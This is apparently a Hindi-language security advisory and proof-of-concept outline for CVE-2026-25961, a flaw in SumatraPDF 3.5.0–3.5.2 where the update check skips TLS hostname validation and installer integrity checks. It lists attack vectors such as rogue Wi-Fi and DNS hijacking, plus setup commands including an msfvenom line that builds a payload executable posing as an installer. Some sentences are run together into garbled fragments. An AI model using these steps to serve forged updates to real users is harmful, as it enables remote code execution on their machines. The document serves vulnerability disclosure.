
SumatraPDF संस्करण 3.5.0 से 3.5.2 अपडेट जांच के दौरान TLS होस्टनाम सत्यापन अक्षम कर देते हैं # (INTERNET_FLAG_IGNORE_CERT_CN_INVALID का उपयोग करके) और डाउनलोड किए गए इंस्टॉलर पर कोई हस्ताक्षर या अखंडता # सत्यापन नहीं करते हैं।
CVE-2026-25961 – दुर्भावनापूर्ण अपडेट सर्वर के माध्यम से रिमोट कोड निष्पादन
लेखक: मोहम्मद इदरीस बन्यामेर
दिनांक: फरवरी 2026
CVE: CVE-2026-25961
GHSA: GHSA-xpm2-rr5m-x96q
CVSS v3.1: 7.5 उच्च (AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
प्रभावित संस्करण: SumatraPDF 3.5.0 – 3.5.2
परीक्षण किया गया: Windows 10 / Windows 11
SumatraPDF संस्करण 3.5.0 से 3.5.2 स्वतः-अपडेट जांच के दौरान TLS होस्टनाम सत्यापन अक्षम कर देते हैं और डाउनलोड किए गए इंस्टॉलर की डिजिटल हस्ताक्षर या अखंडता की पुष्टि नहीं करते हैं।
नेटवर्क-स्थित हमलावर निम्न कार्य कर सकता है:
https://www.sumatrapdfreader.org/update-check-rel.txt के अनुरोध को इंटरसेप्ट / स्पूफ करनाCreateProcess के माध्यम से फ़ाइल निष्पादित करता हैयथार्थवादी हमले के वेक्टर: दुष्ट Wi-Fi, समझौता किया गया होम/ऑफिस राउटर, DNS अपहरण, पारदर्शी प्रॉक्सी इंजेक्शन, आदि।
update-check-rel.txt प्रतिक्रिया जाली बनाता हैpip install flask
# msfvenom के साथ उदाहरण (वैकल्पिक)
msfvenom -p windows/x64/exec CMD=calc.exe -f exe > malicious_installer.exe
#सर्वर चलाएं:
python3 CVE-2026-25961_poc.py